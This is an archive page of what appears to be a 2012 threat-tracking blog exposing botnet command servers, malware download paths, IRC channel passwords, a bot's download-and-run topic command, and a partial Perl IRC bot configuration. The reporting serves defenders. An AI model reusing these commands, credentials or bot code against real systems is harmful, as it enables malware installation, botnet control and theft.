Month: December 2012

beerpigfarm.ru (Installs crap hosted by Santex.net)

Uncategorized

Resolved beerpigfarm.ru to 46.166.130.216 I found a file on h4r3’s latest andromeda that downloaded a bunch of crap from this site. hxxp://beerpigfarm.ru/smo Smoke loader, posted here hxxp://beerpigfarm.ru/min is a bitcoin miner, uses 50btc Mining info: http://169TpR47JVcLaQXdGYE6Lv4Ps9DbVqHhSi:x@pool.50btc.com:8332 Since he’s using no account mode we can snoop on his mining by plugging in his address on theRead more...

group-gz.me (Andromeda http botnet hosted by Panamaserver.com)

Uncategorized

Resolved group-gz.me to 190.123.47.198 Server:   group-gz.me Gate file:   /.daci/perete.php Plugins Rootkit:  group-gz.me/.daci/r.pack Socks:  group-gz.me/.daci/s.pack Formgrabber:  group-gz.me/.daci/f.pack   Gate file:  group-gz.me/.daci/fg.php This guy is installing the recently posted survey winlocker on his bots. Hosting infos: http://whois.domaintools.com/190.123.47.198

honey.punked.us (Andromeda http botnet hosted by kimsufi.com

Uncategorized

Resolved honey.punked.us to 94.23.213.78   Server:   honey.punked.us Gate file:  /sex/image.php Plugins Rootkit:  http://doncarlosmayorista.com/.sec/r.pack Socks:  http://doncarlosmayorista.com/.sec/s.pack Formgrabber:  http://doncarlosmayorista.com/.sec/f.pack   Gate file:   honey.punked.us/sex/fg.php This is the new andromeda of the french hecker h4r3. Now he’s using cracked andromeda with free domains. Hosting infos: http://whois.domaintools.com/94.23.213.78

64.56.64.29(ngr botnet hosted in United States Los Angeles Perfect International In)

Uncategorized

server: 64.56.64.29:1887 server: 174.37.172.71:1887server: 184.172.60.181:1887server: 5.153.6.203 TCP:1887Server Password:Username: hxfyijcNickname: n{DE|XPa}hxfyijcChannel: #pool (Password: leonis) Cannel:#r3Channeltopic: :~pu hxxp://hotfile.com/dl/184384511/5b0f4b2/omaigato.exe 765cce9dee5448f58d9e798d91dbf809 ~s -o ~s find more infos about the owner and domains searching for 1887 in this blog downloaded samples: hxxp://199.7.177.244/dl/184384734/6e6cd1d/all.exe==>downloads these links:hxxp://80.86.83.93/index (2musicaonline.com)hxxp://80.86.83.93/Emo-Screamo/ (2musicaonline.com) hxxp://hotfile.com/dl/184299133/b91a140/8346g527rg239gth34t24t.html thanks to aLiSs the turkish kebap for submiting samples hosting infos: http://whois.domaintools.com/64.56.64.29

unlockyourdesktop.info (Winlocker hosted by nerdie.net)

Uncategorized

 Resolved unlockyourdesktop.info to 199.96.156.208 Yet another survey based winlocker. This one follows the established pattern of ukash and moneypack winlockers by loading a webpage that contains the surveys rather than simply loading the offers like the previous variants. Winlocker site showing offers This version does not appear to do anything to prevent the use ofRead more...

zxz.consulting-info.eu (Multiple http botnets hosted by France Roubaix Ovh Sas)

Uncategorized

Resolved zxz.consulting-info.eu to 5.39.71.80 This is the french hecker known as h4r3 who has been posted before Andromeda This is the same andromeda net that was posted before, just with the rest of the domains. Previous/disabled domains vvv.exp1oit.in xxx.be-shopping.net Current domain:  zxz.consulting-info.eu Gate file:  /service/image.php Plugins: Rootkit:  tbontepaard.nl/gllr/r.pack Socks:  tbontepaard.nl/gllr/s.pack kbot Server:   zxz.consulting-info.eu GateRead more...

Master Poko Perlbot vS PiF(linux bots hosted in France Paris Gandi Sas)

Uncategorized

var $config = array("server"=>"92.243.21.133", "port"=>"6667", "pass"=>"", "prefix"=>"soldiers", "maxrand"=>"5", "chan"=>"#ddos2", "chan2"=>"#ddos2", "key"=>"ddos", "modes"=>"+p", "password"=>"dor", "trigger"=>".", "hostauth"=>"*" Local users: Current Local Users: 188 Max: 190 Global users:Current Global Users: 188 Max: 190 around 130 linux bots in #unix Master Poko Perlbot vS PiF: #!/usr/bin/perl # # Master Poko Perlbot vS PiF # my @mast3rs = ("Norman","Norman-"); myRead more...